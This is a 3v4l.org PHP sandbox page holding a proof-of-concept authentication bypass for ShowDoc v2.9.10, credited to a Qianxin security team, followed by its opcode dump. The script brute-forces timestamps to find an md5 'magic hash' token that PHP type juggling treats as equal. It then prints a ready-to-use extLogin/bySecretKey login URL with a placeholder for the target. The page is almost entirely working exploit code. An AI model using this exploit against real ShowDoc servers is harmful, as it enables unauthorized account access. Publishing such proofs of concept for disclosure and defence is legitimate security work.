3v4l.org

run code in 300+ PHP versions simultaneously
<?php // Credit:Qianxin, Network Security Department, Product-Safety Team ( Unc1e ) // Date:2021/10/13 /* ShowDoc v2.9.10 Auth Bypass PoC #2: 1) PHP Type Juggling (弱类型), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf 2) Using that: ('0e111' == '0e222') => (bool)true 3) This script use Brute-Forcing to find a possible collision */ $username = 's' ; // Forged username $time = 1694131871 ; //2023-09-08 08:11:11, always valid timestamp $login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; //a possible bin2hex( random_bytes( 16 ) ); $total = 1000000; for ($i=0; $i<(1000*$total); $i++){// try to Find solution in 1 Billion numbers! $time += 1; $token = md5($username.$login_secret_key.$time); if (substr($token, 0, 2) === "0e"){ if(preg_match('/^[0]+e[0-9]+$/', $token)) //0e123, 00e123, ... { echo "time:$time, while final is: $token".PHP_EOL; } } if (($i % $total) == 0){ echo "[".($i/$total)."‰]".PHP_EOL; } } echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;// Please replace the [showdoc] to your target ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 40
Branch analysis from position: 40
2 jumps found. (Code = 44) Position 1 = 43, Position 2 = 6
Branch analysis from position: 43
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 6
2 jumps found. (Code = 43) Position 1 = 20, Position 2 = 31
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 25, Position 2 = 31
Branch analysis from position: 25
2 jumps found. (Code = 43) Position 1 = 34, Position 2 = 39
Branch analysis from position: 34
2 jumps found. (Code = 44) Position 1 = 43, Position 2 = 6
Branch analysis from position: 43
Branch analysis from position: 6
Branch analysis from position: 39
Branch analysis from position: 31
Branch analysis from position: 31
filename:       /in/DBlsO
function name:  (null)
number of ops:  53
compiled vars:  !0 = $username, !1 = $time, !2 = $login_secret_key, !3 = $total, !4 = $i, !5 = $token
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   11     0  E >   ASSIGN                                                   !0, 's'
   12     1        ASSIGN                                                   !1, 1694131871
   13     2        ASSIGN                                                   !2, '35d0b093f240cf6abedbe85fb174d317'
   16     3        ASSIGN                                                   !3, 1000000
   17     4        ASSIGN                                                   !4, 0
          5      > JMP                                                      ->40
   18     6    >   ASSIGN_OP                                     1          !1, 1
   19     7        INIT_FCALL                                               'md5'
          8        CONCAT                                           ~12     !0, !2
          9        CONCAT                                           ~13     ~12, !1
         10        SEND_VAL                                                 ~13
         11        DO_ICALL                                         $14     
         12        ASSIGN                                                   !5, $14
   20    13        INIT_FCALL                                               'substr'
         14        SEND_VAR                                                 !5
         15        SEND_VAL                                                 0
         16        SEND_VAL                                                 2
         17        DO_ICALL                                         $16     
         18        IS_IDENTICAL                                             $16, '0e'
         19      > JMPZ                                                     ~17, ->31
   21    20    >   INIT_FCALL                                               'preg_match'
         21        SEND_VAL                                                 '%2F%5E%5B0%5D%2Be%5B0-9%5D%2B%24%2F'
         22        SEND_VAR                                                 !5
         23        DO_ICALL                                         $18     
         24      > JMPZ                                                     $18, ->31
   23    25    >   ROPE_INIT                                     4  ~20     'time%3A'
         26        ROPE_ADD                                      1  ~20     ~20, !1
         27        ROPE_ADD                                      2  ~20     ~20, '%2C+while+final+is%3A+'
         28        ROPE_END                                      3  ~19     ~20, !5
         29        CONCAT                                           ~22     ~19, '%0A'
         30        ECHO                                                     ~22
   27    31    >   MOD                                              ~23     !4, !3
         32        IS_EQUAL                                                 ~23, 0
         33      > JMPZ                                                     ~24, ->39
   28    34    >   DIV                                              ~25     !4, !3
         35        CONCAT                                           ~26     '%5B', ~25
         36        CONCAT                                           ~27     ~26, '%E2%80%B0%5D'
         37        CONCAT                                           ~28     ~27, '%0A'
         38        ECHO                                                     ~28
   17    39    >   PRE_INC                                                  !4
         40    >   MUL                                              ~30     !3, 1000
         41        IS_SMALLER                                               !4, ~30
         42      > JMPNZ                                                    ~31, ->6
   32    43    >   ROPE_INIT                                     7  ~33     'http%3A%2F%2F%5Bshowdoc%5D%2Fserver%2F%3Fs%3D%2Fapi%2FextLogin%2FbySecretKey%26username%3D'
         44        ROPE_ADD                                      1  ~33     ~33, !0
         45        ROPE_ADD                                      2  ~33     ~33, '%26time%3D'
         46        ROPE_ADD                                      3  ~33     ~33, !1
         47        ROPE_ADD                                      4  ~33     ~33, '%26token%3D'
         48        ROPE_ADD                                      5  ~33     ~33, !5
         49        ROPE_END                                      6  ~32     ~33, '%26redirect%3D'
         50        CONCAT                                           ~37     ~32, '%0A'
         51        ECHO                                                     ~37
   34    52      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
170.75 ms | 1405 KiB | 19 Q